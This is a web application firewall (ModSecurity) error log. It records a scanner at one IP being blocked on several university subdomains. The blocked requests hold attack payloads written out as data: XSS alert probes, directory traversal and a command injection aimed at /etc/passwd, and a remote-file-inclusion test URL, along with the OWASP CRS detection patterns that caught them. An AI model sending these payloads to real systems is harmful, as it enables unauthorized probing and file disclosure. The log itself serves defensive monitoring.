[Tue Aug 29 11:41:05.409162 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "journal.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAActbHUAAAAH"]
[Tue Aug 29 11:41:05.420942 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcuUnEAAAAI"]
[Tue Aug 29 11:41:05.423361 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcoNPQAAAAF"]
[Tue Aug 29 11:41:05.457040 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcYU9cAAAAp"]
[Tue Aug 29 11:41:05.475817 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcvBe8AAAAJ"]
[Tue Aug 29 11:41:05.478408 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcYU9gAAAAp"]
[Tue Aug 29 11:41:05.489673 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAActbHgAAAAH"]
[Tue Aug 29 11:41:05.508348 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cat_id: ${system(cat/etc/passwd)}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO124cCo-f0AAAcsLE4AAAAE"]
[Tue Aug 29 11:41:05.518488 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO124cCo-f0AAAcvBfEAAAAJ"]
[Tue Aug 29 11:41:05.525710 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22Message\\x22: found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJEC [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcYU9oAAAAp"]
[Tue Aug 29 11:41:05.531745 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAYf-NgAAAAD"]
[Tue Aug 29 11:41:05.533418 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAActbHoAAAAH"]
[Tue Aug 29 11:41:05.537638 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO124cCo-f0AAAcvBfIAAAAJ"]
[Tue Aug 29 11:41:05.553359 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAcYU9sAAAAp"]
[Tue Aug 29 11:41:05.556231 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO124cCo-f0AAAYMWVgAAAAR"]
[Tue Aug 29 11:41:06.858376 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/CFIDE/debug/cf_debugFr.cfm"] [unique_id "ZO124sCo-f0AAAcoNQAAAAAF"]
[Tue Aug 29 11:41:07.423488 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/catalog.php"] [unique_id "ZO1248Co-f0AAAcYU@oAAAAp"]
[Tue Aug 29 11:41:07.505994 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22Type\\x22:\\x22 found within ARGS_NAMES:{\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}: {\\x22Type\\x22:\\x22SubscriptionConfirmation\\x22,\\x22Message\\x22:\\x22\\x22,\\x22SubscribeURL\\x22:\\x22https://rfi.nessus.org/rfi.txt\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/w3-total-cache/pub/sns.php"] [unique_id "ZO1248Co-f0AAAcqJIQAAAAG"]
[Tue Aug 29 11:41:07.682250 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:s_Language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:s_Language: ../../../../../../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/language/lang"] [unique_id "ZO1248Co-f0AAAcoNQYAAAAF"]
[Tue Aug 29 11:41:07.899829 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO1248Co-f0AAAcoNQ0AAAAF"]
[Tue Aug 29 11:41:08.262143 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:userPage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:userPage: javascript:alert(1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/cfusion/debug/cf_debugFr.cfm"] [unique_id "ZO125MCo-f0AAAczXccAAAAL"]
[Tue Aug 29 11:41:08.373265 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXcwAAAAL"]
[Tue Aug 29 11:41:08.388413 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcYU-MAAAAp"]
[Tue Aug 29 11:41:08.399571 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXc0AAAAL"]
[Tue Aug 29 11:41:08.474475 2023] [:error] [pid 1843] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAczXc8AAAAL"]
[Tue Aug 29 11:41:08.481537 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:wp_abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:wp_abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZO125MCo-f0AAAcoNREAAAAF"]
[Tue Aug 29 11:41:09.280178 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sponsor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:sponsor: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.dhtml"] [unique_id "ZO125cCo-f0AAAcYVAMAAAAp"]
